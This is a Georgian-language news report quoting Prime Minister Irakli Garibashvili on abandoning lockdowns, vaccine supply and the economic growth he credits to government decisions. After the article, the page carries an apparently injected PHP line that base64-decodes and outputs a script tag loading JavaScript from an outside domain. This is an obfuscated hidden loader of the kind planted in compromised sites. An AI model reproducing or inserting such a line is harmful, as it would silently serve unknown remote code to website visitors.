celsiusi
ავერსი შნაიდერი
საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, მთავრობის გადაწყვეტილებების შედეგია, რომ ქვეყანაში მაღალი ეკონომიკური ზრდა შეინიშნება და "ბიზნესი დამშვიდებულია". ამის შესახებ მან ტყიბულში ჟურნალისტების კითხვის საპასუხოდ განაცხადა, რომელიც ირაკლი ღარიბაშვილის მთავრობის მიერ პანდემიის მართვის სტრატეგიის შეფასებას შეეხებოდა.
 
ირაკლი ღარიბაშვილმა აღნიშნა, რომ გიორგი გახარიას პრემიერობისას, ის საკოორდინაციო საბჭოს წევრი იყო და რადგან მაშინ ქვეყანაში ვაქცინები ჯერ არ იყო ეპიდემიის სამართავად ქვეყნის დაკეტვა მნიშვნელოვანი იყო, დღეს კი ვაქცინაცია ის ალტერნატივაა, რომელიც ქვეყნის სრული ჩაკეტვის საშუალებას არ იძლევა.
 
„ქვეყნის დაკეტვაზე მარტივი არაფერია. ერთ საათში შემიძლია გადავკეტო მთელი ქვეყანა. ეს არ არის გამოსავალი. ჩვენ არჩევანი მოვუტანეთ მოსახლეობას. ჩამოვიტანეთ 3 მლნ ვაქცინა - სინოფარმი, სინოვაკი, ფაიზერი და ასტრაზენეკა და მოსახლეობამ უნდა გადაწყვიტოს... ვაქცინაცია, პირბადის ტარება და ახლობლების დაცვა აუცილებელია.
 
დღეს ქვეყნის ჩაკეტვა შეუძლებელია. ჩვენ ვთქვით, რომ ცალკეული შეზღუდვები შეიძლება დაწესდეს და დავაწესეთ კიდევაც. სიტუაცია ნელ-ნელა სტაბილიზაციისკენ მიდის. მთელმა მსოფლიომ ანალოგიური გზა გაიარა. ქვეყნის ეკონომიკის გახსნას ალტერნატივა არ აქვს, მით უმეტეს ჩვენნაირი პატარა ქვეყნისთვის. აშშ-ს მთავრობამ თქვა, რომ ქვეყნის ჩაკეტვა აღარ მოხდება, იგივე განაცხადეს ევროპელებმა, ბრიტანეთის პრემიერმა, გერმანიამ, საფრანგეთმა... შედეგი გვაქვს ის, რომ დღეს ორნიშნა ეკონომიკური ზრდა გვაქვს. მე ვამაყობ იმით, რომ ბიზნესი დამშვიდებულია, ჩვენი ეკონომიკა სტაბილურად ვითარდება და გვაქვს უპრეცენდენტო ზრდა ეკონომიკის. ის, რომ ტურიზმის სეზონი არ ჩავარდა და ჩვენს მოსახლეობას დამატებითი შემოსავალი გაუჩნდა, სწორედ ამ გადაწყვეტილებების შედეგია. ამ პროცესში აუციელებლია ეკონომიკის ზრდის შენარჩუნება და პროცესის მართვა“, - განაცხადა პრემიერმა.
 
კითხვაზე კი როგორ მართავს მდგომარეობას ირაკლი ღარიბაშვილმა უპასუხა: „ჩვენ მართვა შემდეგნაირად გვესმის, რომ არც ერთი მოქალაქე ზრუნვის და მკურნალობის გარეშე არ დარჩეს და ამას დღევანდელი ჯანდაცვის სისტემა ახერხებს“.
1021
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");